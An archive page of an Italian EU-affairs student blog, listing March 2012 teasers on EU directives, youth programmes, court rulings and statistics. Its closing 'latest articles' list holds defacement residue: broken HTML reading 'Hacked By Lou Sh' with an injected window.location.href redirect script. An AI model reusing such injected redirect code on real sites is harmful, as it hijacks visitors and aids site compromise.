EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Marzo 2012
it

La semplificazione di una normativa importante come quella sulle valutazioni d’impatto ambientale è stato l’obiettivo perseguito dalla Commissione Europea. La direttiva originaria e le tre successive revisioni sono state codificate in un unico testo, garantendo non solo una maggiore leggibilità e comprensione, ma anche il rispetto delle norme vigenti nella sua forma originaria. È stata l’importanza attribuita alla direttiva VIA, la quale assicura la valutazione da parte delle autorità competenti prima della realizzazione di progetti edilizi, a indurre l’Ue a promuovere una versione più semplice della stessa.

Al fine di assicurare una più agevole valutazione degli impatti ambientali degli impianti edilizi, la Commissione europea ha promosso una semplificazione della direttiva VIA (Valutazioni sull’Impatto Ambientali). La disposizione originaria, del 1985, e le sue tre successive revisioni, (...)

it

Creare nuovi spazi per la partecipazione giovanile alla vita pubblica è la priorità dell’associazione Giosef Italy, da sempre impegnata nella realizzazione di attività e progetti che incoraggiano la partecipazione giovanile in ogni sua forma. Si tratta di un’organizzazione presente su tutto il territorio nazionale e suddivisa in diverse sedi locali ciascuna delle quali ha la libertà di agire in maniera autonoma, usufruendo degli strumenti più consoni alla propria realtà locale. È il caso della Giosef di Caserta, che ha proposto la partecipazione dei giovani ad un’interessante progetto 1.1 Youth in Action: uno scambio culturale, il “Bridge between generation”, che si terrà a Marzo in Bulgaria, precisamente a Karlovo e al quale parteciperanno l’Italia, la Spagna, il Portogallo, la Lituania, la Slovacchia e l’Ungheria.

La “Youth in Action” (Gioventù in azione) è un programma di finanziamento della Commissione europea che ha come obiettivo quello di favorire il processo di integrazione giovanile e che dispone di un budget di 885 milioni di euro, stanziato per sette anni. Un progetto che sostiene attivamente la (...)

it

In una riunione del 30 gennaio scorso a Bruxelles, i Leader dei Paesi europei hanno affrontato lo scottante discorso della disoccupazione giovanile e della sua evoluzione. Dal dibattito è emerso che sempre meno giovani si affacciano al mondo del lavoro. E’ necessario dunque un intervento rapido e deciso per cambiare rotta.

Ben otto Paesi della Comunità (Italia, Spagna, Portogallo, Grecia, Lituania, Lettonia, Irlanda e Slovacchia) presentano un livello di disoccupazione giovanile che supera largamente la media europea. La Commissione Europea ha deciso quindi che è arrivata l’ora di agire al fine di garantire un (...)

it

Il nostro paese ha rifiutato la proposta dell'UE a causa della qualità del suo petrolio, ritenuto uno dei più "sporchi" in assoluto.

La Fuel Quality Directive è nata nel 2009 ed ha come obiettivo quello di ridurre di almeno il 6% le emissioni derivanti dall’uso di combustibili entro il 2020. Questa nuova estensione, varata il 23 Febbraio 2012, avrebbe voluto interrompere l’utilizzo di combustibili che derivano da estrazioni (...)

it

On the eve of the Russian elections is worth looking at the relations between Europe and Russia and of the political implications for the EU of the elections. The relation has always been peculiar: geographically, Europe and Russia are overlapping entities: half of Europe is Russia; half of Russia is in Europe. However, politics, in contrast to geography, do not necessarily take this axiomatically – either in Europe or in Russia. The relations between Russia and Europe have in fact been marked by attraction (and sometimes emulation on the part of Moscow) and need to cooperate, periodically replaced by competition and mistrust. Similar ups and downs have also characterized the institutional ties between the Russian Federation and the EU.

Moscow’s leadership is promoting an equal and strategic relationship with Brussels (similarly to the NATO-Russia Council) that excludes the long-term objective of full-fledged integration but allows Russia to claim its great power status. Putin put re-integration of the post-Soviet space high on (...)

it

Il 16 febbraio 2012, dopo un contenzioso durato diversi anni e che vedeva contrapposti la Sabam da un lato, e Netlog dall’altro, la Corte di Giustizia dell’UE ha finalmente emesso la sua sentenza. I gestori dei social network non possono essere costretti ad adottare un sistema di filtraggio sulle attività degli utenti per prevenire un utilizzo illecito di opere musicali e audiovisive. I social network sono salvi e la rete festeggia.

Era il 23 giugno 2009 quando la Sabam, “Société d’Auteurs Belge – Belgische Auteurs Maatschappij”, corrispettivo belga dell’italiana SIAE – Società italiana degli autori ed editori – citava in giudizio, rivolgendosi al Tribunale di primo grado di Bruxelles, Netlog, reo di consentire ai suoi utenti di (...)

it

“Creare il futuro che vogliamo”, questa è la parola d’ordine nonché tema proposto per quest’anno dal Concorso Internazionale di Componimento per i Giovani, organizzato dalla Fondazione Goi Peace e dall’UNESCO. Si tratta di un concorso annuale di componimento rivolto, in via esclusiva, ai giovani di età non superiore ai 25 anni.

Obiettivo di questo concorso è quello di porre la società in ascolto della voce dei giovani, di dare spazio alle loro iniziative per costruire le fondamenta del futuro, di prendere in considerazione le loro aspettative e speranze nonché le loro originali e innovative idee. Un tema che rispecchia (...)

it
en

Gli International Summer Seminars Jean Monnet, che prendono il nome dal Centro di Eccellenza dell’Università di Roma Tor Vergata che li organizza giungono alla nona edizione ed avranno luogo dal due al tredici luglio 2012 a Roma. Il tema scelto per i corsi di quest’anno è “The Future of International Politics and of International Negotiations” (in italiano: il futuro della politica e delle negoziazioni internazionali). In particolare, sono due le domande a cui il seminario cercherà di dare una risposta: in che direzione si sta muovendo il mondo in cui viviamo? Come possiamo rendere le negoziazioni internazionali più efficienti?

Il 2012 è un anno che è stato, è e sarà caratterizzato da eventi politici internazionali molto importanti: le elezioni in Francia, Russia, USA, ma anche in Iran, Venezuela, Egitto, Messico, Libia and altri Stati che hanno un ruolo centrale nelle dinamiche interne di molti Paesi. Il cui risultato (...)

it

Nel 2011, in occasione dell’Anno europeo delle attività di volontariato, è stato creato un portale indirizzato a promuovere tutto ciò che riguarda il cosiddetto Terzo settore, il volontariato appunto. “Volontarioineuropa.eu”, operativo dal luglio 2011, è un progetto pensato e voluto con l’obiettivo di mettere in contatto associazioni, organizzazioni e persone impegnate in attività di assistenza sociale, solidarietà, tutela dell’ambiente e delle fasce più bisognose della popolazione italiana ed europea.

Al fine anche di incrementare il senso d’appartenenza a una comunità vasta e variegata quale è l’Unione Europea, il Parlamento Europeo insieme alla Commissione Europea e alla Presidenza del Consiglio dei Ministri italiano– Dipartimento per le politiche europee, ha dato vita a questo spazio in cui è (...)

it

La Corte di Giustizia Europea, esaminando il sistema italiano di concessione per le scommesse sportive, ha emesso una sentenza in cui viene riconosciuta l’illegittimità delle sanzioni penali per chi opera senza concessione nel settore delle agenzie di scommesse, nonostante il collegamento con bookmakers esteri anche se esclusi da gare indette dall’Amministrazione Autonoma dei Monopoli di Stato (AAMS).

Il 16 febbraio scorso, la Quarta Sezione della Corte di Giustizia Europea ha emesso il suo verdetto nel quale viene riconosciuta come illegittima la norma italiana che, oltre a prevedere sanzioni penali per chi opera privo di concessioni nell’ambito delle scommesse sportive, esclude dal settore (...)

it

I dati forniti dall’Eurostat hanno messo in allerta l’Unione Europea. Un adeguato intervento non si è fatto attendere. È stata, infatti, promossa l’iniziativa “Youth Opportunities” con lo scopo di porre definitivamente fine al problema della disoccupazione giovanile in Europa. Dalle ricerche condotte nell’ultimo periodo è emerso che in Europa circa il 20% dei giovani tra i 15 e i 24 anni devono affrontare quello che può essere definito un vero e proprio disagio: la disoccupazione.

Per far fronte alla drammatica situazione che vede il 9,8% della disoccupazione in Europa, con un preoccupante 20% di disoccupazione giovanile, l’Ue non ha fatto attendere il suo intervento. Il Presidente Barroso, riferendosi proprio alle tristi percentuali emerse dalle ricerche effettuate (...)

en

The Russian Presidential elections have once again revealed the EU’s many contradictions and exposed its dwarf-size political mass. The relation has always been peculiar: geographically, Europe and Russia are overlapping entities: half of Europe is Russia; half of Russia is in Europe. However, politics do not necessarily take this axiomatically – either in Europe or in Russia - and the relation between the two has witnessed an alternation of attraction and cooperation, with competition and mistrust.

Moscow is promoting an equal and strategic relationship with Brussels (similarly to the NATO-Russia Council) that excludes the long-term objective of full-fledged integration but allows Russia to claim its great power status. Vladimir Putin put re-integration of the post-Soviet space high on (...)

it

Il Commissario europeo dell’ambiente, Janez Potočnik, ha annunciato l’avvio di un’inchiesta volta a verificare la presenza di postazioni abusive di caccia sul Delta del Po, garantendo in questo modo l’adozione di eventuali provvedimenti al fine di porre fine al bracconaggio. Numerose sono state le segnalazioni avanzate dal WWF, il quale ha anche avviato una raccolta di firme online per poter incentivare la soluzione del problema.

Dopo le continue denunce arrivate dal WWF e dalla LIPU (Lega Italiana Protezione Uccelli) sull’esistenza di appostamenti abusivi di caccia nel Parco del Delta del Po, incisiva arriva la risposta del Commissario europeo all’ambiente, Janez Potočnik. Constatando l’inadeguatezza delle misure di (...)

it

Il rapporto ha anticipato di qualche giorno la Giornata Europea per la parità retributiva che si è tenuta il 5 Marzo.

Il dato, per quanto preoccupante possa essere, è comunque in miglioramento rispetto agli anni precedenti, nei quali si aggirava intorno al 17%. In Italia la percentuale è per fortuna più bassa rispetto alla media, nel nostro paese le donne guadagnano il 5,5% in meno degli uomini. In altri paesi la (...)

it

Per la Corte Europea dei diritti umani il governo italiano è colpevole di non avere rispettato gli articoli 3 e 4 della Convenzione sui diritti umani: l'Italia ora dovrà rimborsare i migranti che hanno presentato il ricorso. Diverse reazioni dal mondo politico.

La recente sentenza della Corte Europea dei diritti umani può essere benissimo letta come una nuova bocciatura verso la politica dei respingimenti collettivi adottata dall’Italia già in altre occasioni analoghe. Il caso Hirsi è solo l’ultimo in ordine di tempo dei tanti riguardanti l’immigrazione (...)

it

La Notte dei Ricercatori è una delle più celebri iniziative sponsorizzate dalla Commissione europea e rivolta agli appassionati di discipline scentifiche.

Il suo obiettivo è quello di avvicinare tutti, soprattutto le nuove generazioni, alla disciplina in modo stimolante, ma soprattutto divertente.     L’iniziativa si ripropone ogni anno con tematiche sempre diverse in più di 300 città europee. Ogni edizione vede come protagonisti non solo centinaia di (...)

it

Lo scorso febbraio, sono stati lanciati dal Parlamento europeo quattro nuovi programmi con l’intento di rinforzare la presenza della mobilità elettrica nelle strategie UE per la riduzione delle emissioni di CO2 collegate ai trasporti, sia urbani che interurbani.

Agli inizi di febbraio il Parlamento europeo ha lanciato quattro nuovi progetti (MOBI. Europe, ICT4EVEU, MOLECULES e sm@rtCEM) che si inseriscono nel piano della Commissione europea finalizzato ad incentivare la competitività e l’innovazione (CIP). Tramite questi programmi l’UE si auspica di (...)

it

Il progetto “PAC: tra storia e futuro”, finanziato dall’Unione Europea, è qualcosa di più di un semplice progetto dedicato al tema dell’agricoltura; è un impegno, volto a promuovere l’agricoltura come essenziale strumento di valorizzazione ambientale e territoriale, nonché ad evidenziare come la “Politica Agricola Comune” rappresenti uno strumento di indiscutibile necessità per affrontare le sfide dell’intera società.

Il progetto “PAC: tra storia e futuro”, finanziato dall’Unione Europea, è qualcosa di più di un semplice progetto dedicato al tema dell’agricoltura; è un impegno, volto a promuovere l’agricoltura come essenziale strumento di valorizzazione ambientale e territoriale, nonché ad evidenziare come la (...)

it

Alla vigilia delle nuove direttive comunitarie sull'agricoltura, si terranno in Italia una serie di incontri informativi. L’evento di apertura per la presentazione del progetto si è tenuto il 28 Febbraio 2012 presso l’aula magna “Gismondi” dell’Università di Roma Tor Vergata. I promotori dell’iniziativa Pietro Masi, Prorettore Vicario di Tor Vergata, e Marinella Alba Riccardi, Vicepresidente della CIA Lazio, sono intervenuti per la presentazione del progetto e l’intero incontro si è basato su un’analisi dettagliata delle politiche comunitarie in ambito agricolo.

Come nasce il progetto “PAC: tra storia e futuro”? “Il progetto nasce in seguito alla pubblicazione del bando indetto per reperire soggetti interessati a promuovere azioni di informazione sulla PAC (Politica Agricola Comune). In particolare il compito che veniva richiesto era quello di (...)

it

Si è conclusa lo scorso 2 marzo la seconda edizione del Premio “Immagini amiche”. Scopo dell’iniziativa è sradicare tutti gli stereotipi di donna, talvolta sessisti, proposti dalla pubblicità e non solo, stimolando i creativi ad impegnarsi per la produzione di una buona comunicazione che sia quanto più possibile rispettosa dell’immagine femminile.

Il modello di donna che ormai da tempo televisione e pubblicità in generale ci propongono con insistenza è sempre il solito: bella, giovane, quasi eterea, e di conseguenza stupida. Perché sì, il binomio bellezza/intelligenza non può e non deve esistere, perlomeno in Italia. Ma d’altronde non si può (...)

it

Sin dalla firma degli Accordi di Shengen tra i primi Stati firmatari e dalla loro entrata in vigore un decennio più tardi, in Europa si è sempre sentita la necessità di creare un’area in cui i cittadini potessero circolare liberamente, senza controlli ad ogni frontiera. Più recentemente, l’ampliamento del mercato del lavoro europeo ha richiesto la definizione di standard comuni ai Paesi membri in materia di competenze e conoscenze dei singoli lavoratori così da facilitarne l’impiego in ambito comunitario.

Nel 1985, cinque Stati europei decisero di sottoscrivere insieme una serie di accordi relativi alla circolazione delle persone e delle merci nei loro territori. Questa intesa passò alla storia con la denominazione di “Accordi di Schengen”, in onore della piccola cittadina lussemburghese in cui (...)

it

Da indagini condotte recentemente è emerso che l’Italia è in alto alla classifica per sempre più frequenti abbandoni scolastici. Le percentuali risultano preoccupanti in quanto di gran lunga superiori anche alla media dell’intera Unione Europea. Sono, infatti, sempre più numerosi i casi di ragazzi tra i 15 e i 24 anni che decidono di interrompere i propri studi in tempi prematuri. Tra le cause individuate, la principale sembra essere il titolo di studio posseduto dai genitori. Oltre ad essere il Paese con più abbandoni scolastici, l’Italia viene menzionata anche tra i Paesi che indirizzano sempre meno investimenti al settore dell’istruzione.

Sempre più frequenti in Europa sono i casi di abbandono scolastico. Dalle ricerche condotte dall’Istat emergono percentuali che fanno parlare di un vero e proprio allarme. In questo quadro così fortemente drammatico emerge che proprio l’Italia è al quarto posto nella classifica europea. Ben il 19,2% (...)

it

Il gigante rosso fa sul serio: boicotta gli aerei del gruppo europeo, ma l’UE promette di resistere. Ora il rischio è di una guerra commerciale che come al solito penalizzerà soprattutto chi sceglierà di viaggiare in alta quota

Più che la primavera, sembra essere agli inizi di una stagione molto fredda, ricca di crisi diplomatiche internazionali. In principio fu l’India, l’altro colosso asiatico, che con l’Italia ha ingaggiato un durissimo braccio di ferro sulla questione dei due fucilieri della Marina. Dopo un’iniziale (...)

it

+0,3 % nella Zona Euro e +0,4% nei ventisette Stati dell’intera Unione Europea. Sono questi i dati che l’Eurostat ha fornito al mercato e agli Stati europei riguardanti il volume del commercio al dettaglio. Il confronto è avvenuto con riferimento ai dati relativi al precedente mese di dicembre.

L’Eurostat è l’Ufficio Statistico dell’UE ed è un organo che si occupa della raccolta e dell’elaborazione di dati provenienti dai Paesi membri per fini statistici. Il suo principale scopo è quello di fornire ai ventisette Stati un’informazione statistica di qualità, armonizzando i dati in modo da (...)

it

Ad essere sotto accusa è proprio la realizzazione della linea ferroviaria ad alta velocità Torino-Lione che da tempo smuove l’opinione pubblica. Dopo violente manifestazioni di opposizioni, che hanno visto un uomo rischiare la vita dopo una brutta caduta da un traliccio dove era salito per protestare, oggi l’opposizione decide di moderare i toni. È stata, infatti, inviata una lettera ai parlamentari con l’obiettivo di porre seriamente in discussione l’utilità del progetto.

Il movimento no tav di Val di Susa ha inviato una lettera ai 726 membri del Parlamento europeo chiedendo di "prendere atto della violenta, anti-democratica e pericolosa situazione che sta subendo in questo momento la Val di Susa, a causa della imposizione del progetto della linea ferroviaria ad (...)

it

L’Autorità Europea per la sicurezza alimentare, in collaborazione con il Centro Europeo per la prevenzione e il controllo delle malattie (ECDC), ha pubblicato il proprio rapporto annuale, relativo all’anno 2010, riguardante le zoonosi e la trasmissione alimentare delle malattie. Dal documento emergono dati significativi. I casi di Salmonella nell’uomo sono diminuiti del circa 10% e in netta diminuzione sono anche i casi di Salmonella nel pollame. Il dato negativo ci giunge invece dal continuo aumento dei casi di contrazione della campilobatteriosi.

Cos’è l’EFSA e di cosa si occupa? La European Food Safety Authority (EFSA), l’Autorità Europea per la Sicurezza Alimentare, è un organo specializzato dell’Unione Europea con lo scopo di fornire consulenze specifiche agli Stati membri e alle istituzioni dell’UE. Questa agenzia, istituita nel 2002, ha (...)

it

L’indagine commissionata dal gruppo parlamentare Alleanza Progressista dei Socialisti e dei Democratici (S&D) a Bruxelles, ha rivelato 180,257 miliardi di euro di evasione del fisco italiano nel 2009 pari quasi ad un terzo delle entrate totali. Preoccupante anche il valore dell’economia sommersa pari a 418,23 miliardi di euro. Dietro all’Italia si sono piazzate Germania e Francia.

Come se non bastassero i vari declassamenti delle varie agenzie di rating è arrivata da pochi giorni un’altra brutta notizia per l’Italia. L’indagine, basata su dati del 2009, ha rivelato il livello di emergenza economica del Bel Paese. A metterla in luce ci ha pensato un gruppo parlamentare, (...)

it

I dati sono in prospettiva futura e mostrano quella che sarà la situazione delle pensioni europee nel 2020. L'UE vuole risolvere sin da subito la questione per evitare degli strascichi che potrebbero protrarsi negli anni ed arrivare ad una situazione di non ritorno.

L’Unione Europea ha voluto spiegare con molta accuratezza quelli che sono i motivi che porteranno alla futura approvazione della riforma sulle pensioni. L’UE ha in primo luogo fatto notare che oggi la retribuzione post-lavorativa è la maggiore fonte di reddito per un quarto della popolazione, (...)

it

La Commissione europea ha ideato un programma volto a mettere in comunicazione diverse organizzazioni con lo scopo di abbattere un nemico comune, la droga. Grazie ad esso è possibile impegnarsi e porre un argine al problema presentando iniziative volte a contrastare l’uso di stupefacenti. Diversi tipi di enti possono farlo adeguandosi a quello che il programma in questione richiede.

La Commissione europea si compone al suo interno di ventisei direzioni generali (sigla DG), che rappresentano i dicasteri impegnati a regolare specifici campi attraverso la redazione di proposte di legge e programmi. Appartiene a questo gruppo la DG Giustizia, libertà e sicurezza i cui obiettivi (...)

it

Scade il prossimo 5 aprile il termine ultimo per la presentazione degli elaborati che approfondiscono temi di attualità politica. Sono chiamati ad esprimere la propria opinione tutti gli studenti europei, dalla scuola primaria all'università.

L’Istituto Regionale di Studi Europei (IRSE) della regione Friuli Venezia Giulia ha indetto un concorso intitolato “Europa e giovani 2012”. Il bando è rivolto agli alunni che frequentano le scuole di ogni ordine e grado, agli studenti universitari e ai neolaureati (purchè non compiano 27 anni oltre (...)

it

Si chiama “Premio per i giovani giornalisti iscritti alle Scuole di giornalismo” l’ultima iniziativa nata dalla collaborazione tra la Rappresentanza italiana della Commissione europea e l’Associazione Giornalisti Scuola di Perugia (AGSP). Stile giornalistico, ritmo e dinamica, sono solo alcuni dei requisiti necessari per aggiudicarsi la vittoria del concorso.

Sensibilizzare i giovani giornalisti sull’importanza che la legislazione europea riveste per i cittadini italiani e assicurare alle azioni dell’UE una maggiore copertura a livello nazionale, sono gli obiettivi a cui cerca di rispondere il “Premio per i giovani giornalisti iscritti alle Scuole di (...)

it

"Dobbiamo guardare alla Tunisia e ai Paesi vicini non con occhi europei, ma africani. Ma dobbiamo, soprattutto, dare ai giovani protagonisti della primavera araba risposte concrete, per fare si' che il loro sogno diventi realtà".

La scelta dello Stato non è certamente casuale, infatti la Tunisia fu il primo paese (tra quelli che si affacciano sul Mediterraneo) a siglare, nel luglio del ’95, un accordo di associazione con l’Unione Europea. Le due giornate sono state aperte dalla conferenza del FEMIP, il Fondo Euro (...)

it

All'approvazione dei creditori privati fa eco quella dei paesi dell'Eurogruppo, pronti ora a sbloccare nuovi fondi per il salvataggio della Grecia. E intanto Fitch promuove i titoli di stato ellenici.

La Grecia opta per lo swap, trova il si dei creditori privati e dei paesi Eurozone, rilancia i propri titoli di stato e si salva, almeno per il momento, dal rischio di default. È questa in sintesi la “ricetta” derivante dalla recente operazione di swap con la quale lo stato ellenico ha dato il via (...)

it

Il Parlamento Europeo ha approvato il nuovo regolamento che punta a semplificare l'esecuzione delle volontà testamentarie e sveltire interminabili e gravosi processi nel caso di un cittadino europeo deceduto in un Paese diverso da quello d'origine, il cui testamento implichi più di un sistema giuridico nazionale

Prima dello scorso martedì 13 marzo in Europa era praticamente impossibile superare gli ostacoli burocratici legati al tema dell’eredità. Ci si domandava: se mi sposo e vado a vivere in un altro Paese membro, quale iter giuridico devo seguire per la successione in caso di decesso? Bene ora è tutto (...)

it

Il sondaggio Eurobarometro Standard 76 è stato reso noto il 13 marzo 2012 ma è stato realizzato dal 7 al 20 Novembre 2011, analizzando ben 1031 cittadini.

Tempi duri per l’Unione europea, almeno per quel che riguarda il nostro paese. E’ quanto emerge esaminando l’ultimo eurobarometro (servizio della Commissione europea, che valuta e studia l’orientamento dell’opinione pubblica), i cui dati parlano chiaro: uno di questi dice che addirittura il 20% (...)

it

Il Parlamento europeo ha convalidato la formazione di un comitato di inchiesta per combattere la criminalità organizzata, la corruzione e il riciclaggio. Soddisfatti Alfano, Borsellino e Crocetta, promotori dell'iter di approvazione. Il 28 e 29 marzo a Strasburgo si terranno le nomine.

Chi ritiene che quello delle mafie sia un fenomeno circoscritto alla sola penisola italiana dovrà ricredersi; infatti, ormai da lungo tempo gli interessi delle organizzazioni criminali hanno travalicato le Alpi, in cerca di traffici insospettabili e redditizi. Perciò la “globalizzazione” della (...)

it

Finora ci sono stati due Mediatori: il primo è stato Jacob Söderman, finlandese che è stato in carica dal 1995 al 2003, il secondo Nikiforos Diamandouros, greco che è dal 2003 in carica.

Nella maggior parte dei casi, il Mediatore europeo viene chiamato in causa per risolvere casi di cattiva amministrazione che coinvolgono istituzioni ed organismi, ovviamente facenti parte dell’Unione europea. Esso può rilevare, tramite delle indagini, casi di inefficiente amministrazione laddove (...)

it

La lotta contro la criminalità organizzata si inasprisce sempre di più nella Comunità Europea. Nel mirino della Commissione sono finiti questa volta i profitti provenienti da attività criminali e i numerosi patrimoni delle diverse organizzazioni malavitose. Le nuove norme proposte aprono la strada alla collaborazione comunitaria e permettono alle autorità di svolgere la loro attività rapidamente e senza vincoli. Lo scopo è di colpire in fretta al portafoglio la malavita.

Si è calcolato che ogni anno, la criminalità organizzata realizzi profitti illegali che ammontano a migliaia e migliaia di euro che vengono poi puntualmente investiti in attività legali o beni in modo da rendere quasi impossibile, per le autorità, l’azione di identificazione e recupero. In Italia, (...)

it

È previsto per il 22 aprile il termine ultimo per la consegna di video volti a sensibilizzare l’opinione pubblica sulle offerte garantite ai giovani dalla cittadinanza europea. Il progetto nasce per incentivare la conoscenza dell’Unione europea da parte dei giovani e si propone di unire la forza comunicativa della televisione con il sistema di comunicazione oggi più diffuso tra i giovani: internet.

La Rai RadioTelevisione Italiana Spa e il Partenariato di Gestione, composto da Parlamento europeo, Commissione e Dipartimento per le Politiche Europee in collaborazione con il Ministero degli Affari Esteri, hanno dato vita ad un progetto volto a sensibilizzare l’opinione pubblica sul tema (...)

it

Il nuovo Decreto in materia di semplificazioni promosso dall’Esecutivo italiano è già sotto la lente di ingrandimento degli uffici europei. L’attenzione del commissario Kroes, Commissario europeo responsabile per l’Agenda digitale per l’Europa, si è rivolta al settore delle comunicazioni e al rispetto dei poteri dell’Autorità per le Garanzie nelle Comunicazioni.

Cos’è il “Decreto Semplificazioni” Il 13 Marzo scorso, la Camera dei Deputati del Parlamento italiano, con 479 voti favorevoli, 75 no e 7 astensioni, ha concesso la fiducia al decreto legge “sulle semplificazioni” (legge numero 5 del 2012) proposta dal Governo tecnico del Premier Monti sebbene con (...)

it

Si preannuncia un weekend importante quello del 31 marzo-1 aprile 2012 in cui i calciatori delle principali leghe calcistiche europee scenderanno in campo per vincere la partita della vita: combattere la fame nel Sahel e sensibilizzare l’opinione pubblica. L’evento, che rappresenta il primo step della campagna “Professional Football Against Hunger” avverrà in concomitanza con il 20° anniversario dell’ECHO, la direzione generale per l’aiuto umanitario della Commissione europea, e sarà un’occasione per far “suonare l’allarme” sulla terribile crisi che minaccia la regione saheliana.

Esiste una terra, non molto lontana da noi, dove oltre 15 milioni di persone rischiano di diventare vittime di una tremenda carestia alimentare. Esiste una terra, non molto lontano da noi, dove ad oggi sono già 1,3 milioni i bambini che soffrono di malnutrizione acuta. Questa terra si chiama (...)

it

Dalla Commissione Europea è arrivata tempestivamente la condanna al gruppo di militari che giovedì 22 marzo ha rovesciato il regime al potere nel Mali, con l’accusa di incompetenza nella gestione della rivolta dei Tuareg e dei gruppi islamici nel nord del Paese

Iniziata mercoledì mattina nella caserma di Kati, a una quindicina di chilometri dalla capitale Bamako, la rivolta dei militari governativi del Mali si è trasformata nella mattinata di giovedì 22 marzo in un vero colpo di stato. Tra le cause principali, ha annunciato il tenente Amadou Konarè, (...)

it

Vari i temi affrontati, il più scottante sicuramente riguarda la situazione economica del vecchio continente che sembra però, a loro detta, in miglioramento rispetto ai mesi passati.

Angela Merkel, dopo aver dovuto annullare,a causa delle dimissioni del Presidente della Germania Christian Wulff, il suo viaggio in Italia previsto per il 17 febbraio, è finalmente giunta nel nostro Paese per analizzare, con il Premier Mario Monti, la situazione generale europea. Dalle stanze di (...)

it

L’integrità della rete, la tutela della privacy, e lo sviluppo della democrazia sono i principali obiettivi che il Consiglio d’Europa si è posto nell’approvazione della nuova strategia, che ha visto concordi i 47 Paesi membri. Internet, ormai conosciuto come il mezzo di comunicazione più diffuso in tutto il mondo, rappresenta allo stesso modo un vero e proprio sistema da sottoporre a tutela. Ognuno deve poter essere libero di reperire o diffondere notizie sul web, senza l’intervento o il controllo forzato da parte di terzi.

A muovere il Consiglio d’Europa è l’esigenza di garantire maggiore accessibilità del web È stata approvata lo scorso 15 marzo dai 47 governi membri del Consiglio d’Europa la nuova strategia che si propone di garantire un più facile accesso a Internet e di prevenire eventuali censure governative. (...)

it

Il progetto è promosso dal Comune di Roma e viene organizzato ogni due anni dalla Fondazione Mondo Digitale, sotto l’Alto Patronato del Presidente della Repubblica Italiana. Si tratta di un concorso internazionale a cui possono partecipare tutti: associazioni, istituzioni pubbliche e private, cooperative, scuole, università, aziende e singole persone di ogni età provenienti da ogni parte del mondo.

Era il 2000 l’anno in cui venne istituita la prima edizione del Global Junior Challenge, un concorso che mira a premiare l’uso innovativo delle tecnologie informatiche -come internet, la realtà virtuale e i sistemi multimediali - nel campo della formazione, della solidarietà e della cooperazione (...)

it

Per la cattiva ricezione di una direttiva sull'acqua, la Commissione Ue ha inviato una lettera di ultimatum al governo italiano, che ha due mesi di tempo per risolvere la questione e non finire davanti alla Corte di Giustizia europea.

Il 22 marzo, in occasione della ventunesima Giornata mondiale dell’acqua, l’Unione europea ha inviato un ultimatum al governo italiano per il recepimento della direttiva Ue per la tutela di questo bene primario. A renderlo noto è la Commissione europea, che ha denunciato un inadeguato (...)

it

I leader dell'Unione europea hanno deciso, il 2 Marzo 2012, di concedere alla Serbia la possibilità di entrare a far parte del massimo organismo europeo. La decisione è stata presa dopo una riunione a Bruxelles dove è stato necessario superare le resistenze della Romania, la quale, conoscendo molto bene la situazione delle proprie minoranze valacche e romene in Serbia, aveva bloccato temporaneamente l'assegnazione dello status di candidato all'UE.

Finalmente, viene da dire, la Serbia ha ufficialmente la possibilità di entrare a far parte dell’UE. L’ultimo ostacolo, in ordine di tempo, che ha dovuto affrontare, è stata la forte opposizione romena la quale cercava di ottenere maggiori garanzie per le circa 40.000 persone facenti parte delle (...)

it

La paura di nuovi attacchi da parte dei pirati nella zona dell’Africa che affaccia sull’Oceano Indiano e la minaccia alla sicurezza, al commercio e agli aiuti umanitari dell’ONU, ha portato i Ministri degli Esteri europei a prolungare le operazioni di pattugliamento delle acque, ma non solo.

Nella giornata del 22 marzo scorso, i Ministri degli Esteri dei 27 Stati membri dell’Ue (per l’Italia era presente il ministro Giulio Terzi), si sono riuniti a Bruxelles per discutere nuovi provvedimenti e misure contro le azioni di pirateria nella zona del Corno d’Africa e della Somalia. Alla (...)

it

Sono allarmanti i dati resi noti dell’Eurostat - l'Ufficio Statistico dell'Unione Europea, che periodicamente raccoglie ed elabora dati sui paesi europei al fine di fornire un servizio informativo e statistico di qualità – riferiti alle richieste di asilo presentate nel 2011 dai 27 Stati membri. 301mila le richieste totali, con l’Italia che si piazza al terzo posto della classifica registrando ben 34.115 richieste, preceduta da Francia e Germania, rispettivamente prima (56.250) e seconda (53.260).

Se il 2010 aveva fatto registrare una flessione di quasi 7.000 richieste d’asilo presentate dalla popolazione europea, passando da 264.000 richieste del 2009 a 257.800, il 2011 può dirsi sicuramente un anno meno fortunato. Salgono infatti a 301.375 le persone che hanno chiesto protezione in uno (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



